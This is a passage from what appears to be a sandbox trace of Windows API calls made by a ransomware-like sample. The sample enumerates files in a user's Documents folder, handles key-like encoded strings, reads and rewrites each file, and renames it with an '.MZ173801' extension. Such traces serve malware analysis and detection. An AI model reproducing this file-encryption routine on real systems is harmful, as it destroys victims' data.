ftCreationTime.dwHighDateTime=0x1d5ef02, ftLastAccessTime.dwLowDateTime=0x913a31f0, ftLastAccessTime.dwHighDateTime=0x1d5e7fd, ftLastWriteTime.dwLowDateTime=0x913a31f0, ftLastWriteTime.dwHighDateTime=0x1d5e7fd, nFileSizeHigh=0x0, nFileSizeLow=0xe74c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="0A6m BP4.rtf", cAlternateFileName="0A6MBP~1.RTF")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.912] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\0A6m BP4.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\0a6m bp4.rtf"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392c0e0, ftCreationTime.dwHighDateTime=0x1d5ef02, ftLastAccessTime.dwLowDateTime=0x913a31f0, ftLastAccessTime.dwHighDateTime=0x1d5e7fd, ftLastWriteTime.dwLowDateTime=0x913a31f0, ftLastWriteTime.dwHighDateTime=0x1d5e7fd, nFileSizeHigh=0x0, nFileSizeLow=0xe74c)) returned 1 [0121.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.913] GetCurrentThreadId () returned 0x1358 [0121.913] GetCurrentThreadId () returned 0x1358 [0121.913] GetCurrentThreadId () returned 0x1358 [0121.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.914] GetCurrentThreadId () returned 0x1358 [0121.914] GetCurrentThreadId () returned 0x1358 [0121.914] GetCurrentThreadId () returned 0x1358 [0121.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\0A6m BP4.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\0a6m bp4.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.914] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.914] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.914] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xe74c [0121.914] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.914] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xe74c, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xe74c, lpOverlapped=0x0) returned 1 [0121.915] CloseHandle (hObject=0x3d0) returned 1 [0121.916] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\0A6m BP4.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\0a6m bp4.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.918] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xe74c, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0xe74c, lpOverlapped=0x0) returned 1 [0121.919] CloseHandle (hObject=0x3d0) returned 1 [0121.922] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\0A6m BP4.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\0a6m bp4.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\0A6m BP4.rtf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\0a6m bp4.rtf.mz173801")) returned 1 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] GetCurrentThreadId () returned 0x1358 [0121.923] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fc9410, ftCreationTime.dwHighDateTime=0x1d5e101, ftLastAccessTime.dwLowDateTime=0xcc0b1560, ftLastAccessTime.dwHighDateTime=0x1d5ee15, ftLastWriteTime.dwLowDateTime=0xcc0b1560, ftLastWriteTime.dwHighDateTime=0x1d5ee15, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9JNTT48UjoH.pps", cAlternateFileName="9JNTT4~1.PPS")) returned 1 [0121.923] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.923] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\9JNTT48UjoH.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\9jntt48ujoh.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fc9410, ftCreationTime.dwHighDateTime=0x1d5e101, ftLastAccessTime.dwLowDateTime=0xcc0b1560, ftLastAccessTime.dwHighDateTime=0x1d5ee15, ftLastWriteTime.dwLowDateTime=0xcc0b1560, ftLastWriteTime.dwHighDateTime=0x1d5ee15, nFileSizeHigh=0x0, nFileSizeLow=0x2458)) returned 1 [0121.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.924] GetCurrentThreadId () returned 0x1358 [0121.924] GetCurrentThreadId () returned 0x1358 [0121.924] GetCurrentThreadId () returned 0x1358 [0121.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.925] GetCurrentThreadId () returned 0x1358 [0121.925] GetCurrentThreadId () returned 0x1358 [0121.925] GetCurrentThreadId () returned 0x1358 [0121.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\9JNTT48UjoH.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\9jntt48ujoh.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.925] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.925] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.925] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, 